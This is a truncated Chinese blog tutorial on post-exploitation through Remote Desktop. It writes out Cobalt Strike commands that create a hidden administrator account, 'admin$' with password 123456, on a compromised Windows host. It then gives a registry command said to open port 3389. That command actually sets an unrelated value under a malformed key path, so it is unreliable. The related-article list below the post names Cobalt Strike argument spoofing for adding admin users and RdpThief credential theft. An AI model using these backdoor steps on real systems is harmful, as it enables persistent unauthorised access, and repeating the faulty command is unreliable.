内网渗透--远程桌面

最新推荐文章于 2024-04-29 12:47:16 发布
最新推荐文章于 2024-04-29 12:47:16 发布
阅读量669 收藏 4
点赞数
分类专栏: 内网 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31065143/article/details/116273804
版权
本文介绍了如何在Windows内网环境中进行渗透测试,特别是通过远程桌面隐藏用户admin$的创建和管理。首先创建带"$"符号的admin$用户并将其添加到管理员组,然后通过修改注册表权限来隐藏该用户,最后解决远程桌面连接问题。
摘要由CSDN通过智能技术生成

内网渗透–远程桌面

前言

学代码审计有些枯燥,加上俺内网啥也不会,学学内网换换口味。

隐藏用户的创建

因为在Windows环境下创建用户后面如果带入一个“$"符号,在net user时默认是不显示的。

利用条件:获得管理员权限

首先在cs中输入以下命令

shell net user admin$ 123456 /add

shell net localgroup administrators admin$ /add

第一句是创建一个admin$用户密码为123456.第二句是将用户加入管理组。

我们来验证一下,使用net user命令并无admin用户

然后远程打开3389端口。

reg add “HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER” /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

现在已经可以远程连接了,但是中用户组中依然可以看见admin$

最低0.47元/天 解锁文章
pyshare
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
搭建局域网环境的CS结构-实现远程桌面访问- 实现远程共享访问
l578900的博客
08-04 1116
搭建局域网环境的CS结构 虚拟机-设置-更改网络适配器-选择自定义vmnet1仅主机模式-搭建局域网 必须关闭防火墙,否则ping不通 客户端也重复上述步骤,然后互相ping,即可ping通 实现远程桌面访问 首先必须在系统属性中选择允许远程连接 win+R 输入mstsc 输入用户名密码 连接后即可控制服务器的桌面,在桌面新建了一个文件夹。 在服务器这边查看文件夹存在,操作成功。 实现远程共享访问 win+R 输入 \ \服务器的ip地址\c$ ...
内网渗透|后渗透之远程桌面
weixin_43718688的博客
05-06 1342
内网渗透|后渗透之远程桌面 0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文。 0x01 隐藏用户(影子用户)的创建与利用进行权限维持 这里先提一个概念,在windows环境下创建用户如果后面带了一个 DOLLA
使用CSgetshell到3389端口远程桌面
最新发布
carrot11223的博客
04-29 434
中间使用了这个Akagi64.exe提权,网上可以找到,高版本的cs网上也可以找到。
红日实战——使用CS拿下域内主机
a2106883567的博客
09-22 178
其中win7作为web服务器来使用,与其他两个电脑都在内网中,并且可以互相访问。Kali自带了arp扫描器,可以通过这个工具扫描出和自身网卡同一网段的主机。这里使用phpmyadmin日志写shell,先查看有没有开启日志。可以看到没有开启,并且secure_file_priv没有具体值。含有两个网卡,其中一个为VM13为内网,另一个为NAT连接外网。使用root权限进行扫描,很快就可以发现在同一个网段下的主机。可以看到内网之间的主机互通,而外网访问不了内网。arp-scan -l #扫描网段所有主机。
【内网安全】Cobalt Strike 使用
qq_44657899的博客
07-12 2278
文章目录Beacon命令argue参数污染 Beacon命令 argue参数污染 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Argue execute net1 user test test123 /add execute net1 localgroup administrators test /add argue 进程参数欺骗 argue [command] [fake arguments] argue 命令 假参数 欺骗某个命令参数 argue [com
AHZY-内网安全攻防2020-01-12 内网安全攻防知识分享,
08-20
8. **远程连接服务**:启用远程桌面连接服务(RDP)可以通过`reg query`和`wmic`命令来查询和设置端口号,确保安全设置到位。 9. **安全策略**:了解并实施安全策略,如限制不必要的服务、更新系统补丁(通过`...
钉钉的全免费内网渗透服务客户端
06-06
【钉钉全免费内网渗透服务客户端】是针对企业内部网络环境进行安全检测与防护的一款工具,主要用于帮助企业发现并修复网络安全漏洞。这款客户端基于Web技术,意味着用户可以通过浏览器访问和管理,无需安装额外的...
强大的内网渗透辅助工具集-让Yasso像风一样 支持rdp,ssh,redis,postgres,mongodb,m.zip
03-07
RDP 是微软提供的远程桌面服务,允许用户通过网络访问图形化的Windows桌面环境。RDP的常见安全风险包括弱密码、未授权访问等。Yasso 支持 RDP 意味着可以进行 RDP 服务的扫描,识别潜在的漏洞,并尝试进行安全测试...
内网渗透课实验—传输层隧道通信.docx
08-29
Windows 主机上,我们需要开启远程桌面服务,以便 kali Linux 可以远程连接。在 kali Linux 上,我们可以使用 netstat -lnt 命令来查看当前的网络端口情况。 在传输层隧道通信中,我们可以使用 powercat 和 ...
隐藏账户实验.docx
03-09
【网络安全与内网渗透】——隐藏账户的创建、检测与防范 在网络安全领域,了解如何隐藏账户以及如何防范此类威胁是至关重要的。隐藏账户通常被恶意攻击者用来规避系统管理员的监控,以便在系统中执行非法操作。在这...
渗透小技巧从getshell到3389端口远程桌面连接靶机
热门推荐
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-16 1万+
渗透或平时比赛中还在为自己命令行操作不熟而感到烦恼吗?直接命令行方式启动远程桌面连接,让效率提高。
远程桌面】Dell机器登陆与退出远程桌面
小白兔的窝
11-30 2288
进入远程桌面:Ctrl+R->mstsc退出远程桌面:快捷键。 有”Break键“的机器:Ctrl+Alt+Break 没有“Break”键的笔记本:通过“Fn+b”实现“Break”的功能,即Ctrl+Alt+Fn+Break。 没有“Break”键的Dell笔记本:通过“Fn+Insert”实现“Break”的功能,即Ctrl+Alt+Fn+Insert。 没有“Break”的Dell台式机:
内网渗透测试:初探远程桌面的安全问题
MachineGunJoe666
06-16 1380
前言 远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面内网渗透中的各种利用姿势。 文中若有不当之处还请各位大佬多多点评 我的博客:https://whoamianony.top/ RDP 协议 RDP,Remote Desktop Protocol,远程桌面协议,该协议是对国际电信联盟发布的一个国际标准的多通道会议协议T...
渗透技巧——从远程桌面客户端提取明文凭据
systemino的博客
11-22 2497
0x00 前言 在之前的文章《渗透技巧——获得Windows系统的远程桌面连接历史记录》曾介绍了获得远程桌面连接历史记录的方法。 在实际的渗透过程中,如果发现了远程桌面连接的历史记录,奇热那么下一步就需要想办法获取远程桌面连接使用的口令。 本文将会结合RdpThief介绍从远程桌面客户端提取明文凭据的方法,分享需要注意的细节。 RdpThief地址: https://github.com...
内网渗透windows 命令行开启3389
03-30 1879
查看RDP端口 查看端口 REG QUERY “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber 得到连接端口为 0xd3d,转换后为 3389 windows server 2003 开启1: REG ADD “HKLM\SYSTEM\Cur...
最简洁详细内网穿透教程实现远程桌面连接
灵魂学者的博客
05-18 6457
最简洁内网穿透教程实现远程桌面连接,实现远程桌面连接,远程桌面连接仅限于局域网,但可以通过内网穿透的方式实现外网访问。从而实现可以在别的电脑上用不同的网络进行访问自己的电脑。当然现也有第三方软件,不过得在双方得机器上安装对应的软件,例如向日葵,TeamViewer等等相关软件,而远程桌面连接是系统自带的,桌面版的window系统是不支持使用远程桌面的。
内网渗透--ICMP隧道
05-16
对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值